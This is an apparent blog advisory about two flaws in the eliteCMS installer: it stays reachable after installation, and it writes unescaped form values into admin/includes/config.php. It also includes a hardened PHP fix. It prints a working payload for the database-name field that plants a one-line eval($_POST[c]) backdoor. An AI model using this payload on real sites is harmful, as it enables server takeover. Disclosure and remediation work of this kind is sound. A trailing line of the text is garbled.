eliteCMS: installer not locked after installation + one-line shell write vulnerability

Posted on 2012-11-18 13:59:27
The eliteCMS installer is not locked after installation finishes, so a hacker can repeat the installation by visiting the installer's address.

The other vulnerability is that the installer can write a one-liner directly into admin/includes/config.php.
Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // The session values are interpolated straight into the generated PHP
    // source without any escaping of quotes or of "?>".
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    // The assembled source is written to config.php as-is.
    $writer = fopen($file, 'w');
...

Now look at this code:

// The POST fields from the installer form are copied into the session unchanged.
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor will be written into /admin/includes/config.php.
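As an added example (not eliteCMS code), here is how the two spots above can be hardened: the installer refuses to run once a lock file exists, and each setting is serialised with var_export() so that quotes or "?>" in a value stay inside a string literal instead of breaking out into code. The function names and the install.lock path are assumptions.

```php
<?php
// Hardened installer fragment (added example; names and paths assumed).

function config_source(array $settings): string
{
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $value = isset($settings[$key]) ? (string) $settings[$key] : '';
        // var_export() emits a single-quoted PHP literal with ' and \ escaped,
        // so the value is data inside the define() call, never source code.
        $out .= 'define(' . var_export($key, true) . ', '
              . var_export($value, true) . ");\n";
    }
    return $out;
}

function write_config(string $installDir, string $file, array $settings): void
{
    // Step 1: refuse to run again once the installation has completed.
    $lock = $installDir . '/install.lock';
    if (file_exists($lock)) {
        http_response_code(403);
        exit('Installation already completed; remove install.lock to re-run.');
    }
    // Step 2: write config.php atomically, then create the lock file so a
    // second request to the installer is rejected by the check above.
    $tmp = $file . '.tmp';
    if (file_put_contents($tmp, config_source($settings), LOCK_EX) === false
        || !rename($tmp, $file)) {
        exit('Could not write config file.');
    }
    file_put_contents($lock, date('c') . "\n");
}

// Demonstration with a constructed hostile value: the quote and ?> survive
// only as characters inside a string literal in the generated source.
$sample = [
    'DB_SERVER' => 'localhost',
    'DB_NAME'   => '"?><?php /* injected */ ?><?php',
    'DB_USER'   => 'cms',
    'DB_PASS'   => "p'ss",
];
echo config_source($sample);
```

Validating DB_NAME against the characters a database identifier may actually contain (for example a strict [A-Za-z0-9_]+ check) before it ever reaches the session is a second, independent layer worth adding.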
/ K& J& u7 u. x" u3 E